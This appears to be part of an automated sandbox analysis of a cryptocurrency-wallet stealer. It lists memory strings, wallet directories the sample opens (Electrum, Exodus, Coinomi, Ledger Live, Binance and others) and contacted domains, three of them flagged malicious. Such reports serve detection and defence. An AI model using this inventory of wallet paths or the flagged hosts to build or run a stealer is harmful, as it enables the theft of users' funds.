Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: Yara match	File source: 0000001D.00000003.3328560233.0000026BFCFE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2101247626.0000025DE4302000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.2156968765.0000026BFCFE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.2162214809.0000026BFCFE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.2150951747.0000026BFCFE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.3209282947.0000026BFCFDA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.2173790228.0000026BFCFDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 0xKYIPFUTJYQ.exe PID: 7716, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WindowsSecurity.exe PID: 3192, type: MEMORYSTR

Source: 0xKYIPFUTJYQ.exe, 0000001D.00000003.2170456411.0000026BFE611000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: basenameElectrumpath
Source: 0xKYIPFUTJYQ.exe, 0000001D.00000003.2170456411.0000026BFE611000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: basenameElectronCashpath
Source: 0xKYIPFUTJYQ.exe, 0000001D.00000003.2162403062.0000026BFE68F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Jaxx Liberty (Web)
Source: 0xKYIPFUTJYQ.exe, 0000001D.00000003.2170456411.0000026BFE611000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: nameExodus (Web)idaholpfdialjgjfhomihkjbmgjidlcdno
Source: 0xKYIPFUTJYQ.exe, 0000001D.00000003.2130936965.0000026BFB6FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance.
Source: 0xKYIPFUTJYQ.exe, 0000001D.00000003.2138139443.0000026BFB6FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Ethereum (USDT ERC-20)
Source: 0xKYIPFUTJYQ.exe, 0000001D.00000003.2170456411.0000026BFE611000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Ethereum\keystorerecursepattern.*
Source: 0xKYIPFUTJYQ.exe, 0000001D.00000003.3328560233.0000026BFCFE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ProfilesB6

Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	File opened: C:\Users\user\AppData\Roaming\Electrum	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	File opened: C:\Users\user\AppData\Roaming\Electrum	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	File opened: C:\Users\user\AppData\Roaming\WalletWasabi\Client\Wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	File opened: C:\Users\user\AppData\Roaming\WalletWasabi\Client\Wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	File opened: C:\Users\user\AppData\Roaming\Exodus	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	File opened: C:\Users\user\AppData\Roaming\Exodus	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	File opened: C:\Users\user\AppData\Roaming\atomic	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	File opened: C:\Users\user\AppData\Roaming\atomic	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	File opened: C:\Users\user\AppData\Roaming\Binance\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	File opened: C:\Users\user\AppData\Roaming\Binance\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	File opened: C:\Users\user\AppData\Roaming\Binance\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	File opened: C:\Users\user\AppData\Roaming\Binance\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior

IP	Domain	Country	ASN	ASN Name	Malicious
13.59.15.235	collectorj.tvsquared.com	United States	16509	AMAZON-02US	false
3.168.97.94	dg2iu7dxxehbo.cloudfront.net	United States	16509	AMAZON-02US	false
172.67.208.197	emeoxm.com	United States	13335	CLOUDFLARENETUS	true
35.244.154.8	idsync.rlcdn.com	United States	15169	GOOGLEUS	false
54.160.143.175	spdc-global.pbp.gysm.yahoodns.net	United States	14618	AMAZON-AESUS	false
57.144.180.128	scontent.xx.fbcdn.net	Belgium	2686	ATGS-MMD-ASUS	false
157.240.241.35	unknown	United States	32934	FACEBOOKUS	false
142.250.80.2	unknown	United States	15169	GOOGLEUS	false
35.190.80.1	a.nel.cloudflare.com	United States	15169	GOOGLEUS	false
44.210.155.180	collect.tealiumiq.com	United States	14618	AMAZON-AESUS	false
23.210.92.149	a1013.dsct.akamai.net	United States	20940	AKAMAI-ASN1EU	false
35.71.131.137	insight.adsrvr.org	United States	237	MERIT-AS-14US	false
23.33.42.150	unknown	United States	20940	AKAMAI-ASN1EU	false
23.219.82.41	e91869.a.akamaiedge.net	United States	20940	AKAMAI-ASN1EU	false
23.219.82.89	unknown	United States	20940	AKAMAI-ASN1EU	false
104.21.68.46	unknown	United States	13335	CLOUDFLARENETUS	false
172.64.155.119	geolocation.onetrust.com	United States	13335	CLOUDFLARENETUS	false
104.21.92.174	ananalyticsnodes.com	United States	13335	CLOUDFLARENETUS	false
34.102.147.248	intljs.rmtag.com	United States	15169	GOOGLEUS	false
142.250.80.70	dart.l.doubleclick.net	United States	15169	GOOGLEUS	false
63.140.37.151	disneyplus.com.ssl.sc.omtrdc.net	United States	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
52.223.40.198	unknown	United States	8987	AMAZONEXPANSIONGB	false
18.164.116.129	dzfq4ouujrxm8.cloudfront.net	United States	3	MIT-GATEWAYSUS	false
172.67.74.152	api.ipify.org	United States	13335	CLOUDFLARENETUS	false
16.15.184.192	s3.amazonaws.com	United States	unknown	unknown	false
23.44.111.32	e35058.api12.akamaiedge.net	United States	16625	AKAMAI-ASUS	false
69.147.82.61	edge.gycpi.b.yahoodns.net	United States	14779	INKTOMI-LAWSONUS	false
31.13.71.36	star-mini.c10r.facebook.com	Ireland	32934	FACEBOOKUS	false
142.251.40.102	unknown	United States	15169	GOOGLEUS	false
52.1.102.117	b.videoamp.com	United States	14618	AMAZON-AESUS	false
142.251.40.230	ad.doubleclick.net	United States	15169	GOOGLEUS	false
104.21.112.1	security.cleodgiflaoer.com	United States	13335	CLOUDFLARENETUS	true
142.251.40.232	unknown	United States	15169	GOOGLEUS	false
172.67.186.167	analytiwave.com	United States	13335	CLOUDFLARENETUS	false
52.32.69.226	vortex.hulu.com.akadns.net	United States	16509	AMAZON-02US	false
142.251.40.196	unknown	United States	15169	GOOGLEUS	false
142.250.72.100	www.google.com	United States	15169	GOOGLEUS	false
34.98.67.3	ut.linksynergy.com	United States	15169	GOOGLEUS	false
23.221.236.165	unknown	United States	20940	AKAMAI-ASN1EU	false
23.221.236.164	a1355.dscd.akamai.net	United States	20940	AKAMAI-ASN1EU	false
144.172.117.158	unknown	United States	46261	QUICKPACKETUS	true
101.100.210.90	brickfinder.net	Singapore	58621	VODIEN-AS-AP-LOC2VodienInternetSolutionsPteLtdSG	false
34.111.228.132	disney.my.sentry.io	United States	15169	GOOGLEUS	false
104.21.16.1	unknown	United States	13335	CLOUDFLARENETUS	false
142.250.176.196	unknown	United States	15169	GOOGLEUS	false
35.190.43.134	gcp.api.sc-gw.com	United States	15169	GOOGLEUS	false
34.224.225.190	unknown	United States	14618	AMAZON-AESUS	false
18.238.49.66	cnbl-cdn.bamgrid.com	United States	16509	AMAZON-02US	false
142.250.80.98	cm.g.doubleclick.net	United States	15169	GOOGLEUS	false
3.163.245.4	sc-static.net	United States	16509	AMAZON-02US	false
52.72.102.20	unknown	United States	14618	AMAZON-AESUS	false
23.221.239.211	a1910.dscq.akamai.net	United States	20940	AKAMAI-ASN1EU	false
35.186.249.72	d.impactradius-event.com	United States	15169	GOOGLEUS	false
18.119.26.224	unknown	United States	3	MIT-GATEWAYSUS	false
142.251.40.162	adservice.google.com	United States	15169	GOOGLEUS	false
23.48.224.105	e91869.dsca.akamaiedge.net	United States	20940	AKAMAI-ASN1EU	false
63.140.36.131	unknown	United States	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
54.163.146.91	unknown	United States	14618	AMAZON-AESUS	false
104.18.86.42	cdn.cookielaw.org	United States	13335	CLOUDFLARENETUS	false

Name	IP	Active
beacons3.gvt2.com	142.251.35.163	true
s3.amazonaws.com	16.15.184.192	true
collect.tealiumiq.com	44.210.155.180	true
cm.g.doubleclick.net	142.250.80.98	true
www.google.com	142.250.72.100	true
d.impactradius-event.com	35.186.249.72	true
ut.linksynergy.com	34.98.67.3	true
disney.my.sentry.io	34.111.228.132	true
star-mini.c10r.facebook.com	31.13.71.36	true
sc-static.net	3.163.245.4	true
uconnect.tealiumiq.com	54.237.171.213	true
collectorj.tvsquared.com	13.59.15.235	true
beacons2.gvt2.com	142.251.36.3	true
a1013.dsct.akamai.net	23.210.92.149	true
a1910.dscq.akamai.net	23.221.239.211	true
ananalyticsnodes.com	104.21.92.174	true
td.doubleclick.net	142.250.80.98	true
api.ipify.org	172.67.74.152	true
cdn.cookielaw.org	104.18.86.42	true
dzfq4ouujrxm8.cloudfront.net	18.164.116.129	true
analytiwave.com	172.67.186.167	true
cnbl-cdn.bamgrid.com	18.238.49.66	true
a1355.dscd.akamai.net	23.221.236.164	true
dart.l.doubleclick.net	142.250.80.70	true
beacons-handoff.gcp.gvt2.com	142.250.112.94	true
dg2iu7dxxehbo.cloudfront.net	3.168.97.94	true
adservice.google.com	142.251.40.162	true
spdc-global.pbp.gysm.yahoodns.net	54.160.143.175	true
insight.adsrvr.org	35.71.131.137	true
scontent.xx.fbcdn.net	57.144.180.128	true
idsync.rlcdn.com	35.244.154.8	true
brickfinder.net	101.100.210.90	true
intljs.rmtag.com	34.102.147.248	true
gcp.api.sc-gw.com	35.190.43.134	true
e91869.a.akamaiedge.net	23.219.82.41	true
a.nel.cloudflare.com	35.190.80.1	true
security.cleodgiflaoer.com	104.21.112.1	true
ad.doubleclick.net	142.251.40.230	true
disneyplus.com.ssl.sc.omtrdc.net	63.140.37.151	true
datacloud.tealiumiq.com	54.237.171.213	true
beacons.gvt2.com	142.251.182.94	true
e91869.dsca.akamaiedge.net	23.48.224.105	true
emeoxm.com	172.67.208.197	true
b.videoamp.com	52.1.102.117	true
e35058.api12.akamaiedge.net	23.44.111.32	true
beacons4.gvt2.com	216.239.32.116	true
geolocation.onetrust.com	172.64.155.119	true
edge.gycpi.b.yahoodns.net	69.147.82.61	true
vortex.hulu.com.akadns.net	52.32.69.226	true
tr.snapchat.com	unknown	unknown
js.adsrvr.org	unknown	unknown
sanalytics.disneyplus.com	unknown	unknown
connect.facebook.net	unknown	unknown
s.yimg.com	unknown	unknown
assetshuluimcom-a.akamaihd.net	unknown	unknown
vortex.hulu.com	unknown	unknown
www.hulu.com	unknown	unknown
metcon.hulu.com	unknown	unknown
tags.tiqcdn.com	unknown	unknown
sp.analytics.yahoo.com	unknown	unknown
ut.rd.linksynergy.com	unknown	unknown
3797690.fls.doubleclick.net	unknown	unknown
beacons.gcp.gvt2.com	unknown	unknown
www.brickfinder.net	unknown	unknown
ds-aksb-a.akamaihd.net	unknown	unknown
analytics-ipv6.tiktokw.us	unknown	unknown
www.facebook.com	unknown	unknown
collector-1564.tvsquared.com	unknown	unknown
tags.rd.linksynergy.com	unknown	unknown
analytics.tiktok.com	unknown	unknown

Name	Malicious	Reputation
https://collector-1564.tvsquared.com/tv2track.php?action_name=Stream%20TV%20and%20Movies%20Live%20and%20Online%20%7C%20Hulu&idsite=TV-81453654-1&rec=1&r=459011&h=18&m=11&s=39&url=https%3A%2F%2Fwww.hulu.com%2Fwelcome&_id=fe38f9bc6cda303a&_idts=1750025499&_idvc=0&_idn=1&_viewts=&pdf=1&qt=0&realp=0&wma=0&dir=0&fla=0&java=0&gears=0&ag=0&cookie=1&res=1280x1024&gt_ms=550	false	high
http://s3.amazonaws.com/downloads.mailchimp.com/js/mc-validate.js	false	unknown
https://collector-1564.tvsquared.com/tv2track.js	false	high
https://js.adsrvr.org/up_loader.1.1.0.js	false	high
https://js.adsrvr.org/universal_pixel.js	false	high
https://assetshuluimcom-a.akamaihd.net/FONTS/Graphik-Medium-Web.woff2	false	high
https://collector-1564.tvsquared.com/tv2trackext.js	false	high
https://assetshuluimcom-a.akamaihd.net/FONTS/Graphik-Regular-Web.woff2	false	high
https://assetshuluimcom-a.akamaihd.net/FONTS/Graphik-Bold-Web.woff	false	high
https://assetshuluimcom-a.akamaihd.net/FONTS/Graphik-Semibold-Web.woff2	false	high
https://collector-1564.tvsquared.com/tv2track.php?action_name=Stream%20TV%20and%20Movies%20Live%20and%20Online%20%7C%20Hulu&idsite=TV-81453654-1&rec=1&r=987538&h=18&m=11&s=39&url=https%3A%2F%2Fwww.hulu.com%2Fwelcome&_id=fe38f9bc6cda303a&_idts=1750025499&_idvc=0&_idn=0&_viewts=&cvar=%7B%225%22%3A%5B%22hulunewusers%22%2C%22%7B%5C%22rev%5C%22%3A%5C%220%5C%22%2C%5C%22id%5C%22%3A%5C%22019775a5ea680037d94c15a2fbba0506f001c06700918%5C%22%2C%5C%22promo%5C%22%3A%5C%22%5C%22%7D%22%5D%7D&pdf=1&qt=0&realp=0&wma=0&dir=0&fla=0&java=0&gears=0&ag=0&cookie=1&res=1280x1024&_cvar=%7B%225%22%3A%5B%22session%22%2C%22%7B%5C%22user%5C%22%3A%5C%22019775a5ea680037d94c15a2fbba0506f001c06700918%5C%22%7D%22%5D%7D&gt_ms=550	false	high
https://assetshuluimcom-a.akamaihd.net/h3o/icons/favicon.ico.png	false	high
https://security.cleodgiflaoer.com/?domain=	true	unknown
https://assetshuluimcom-a.akamaihd.net/FONTS/Graphik-SemiboldItalic-Web.woff	false	high
https://ds-aksb-a.akamaihd.net/aksb.min.js	false	high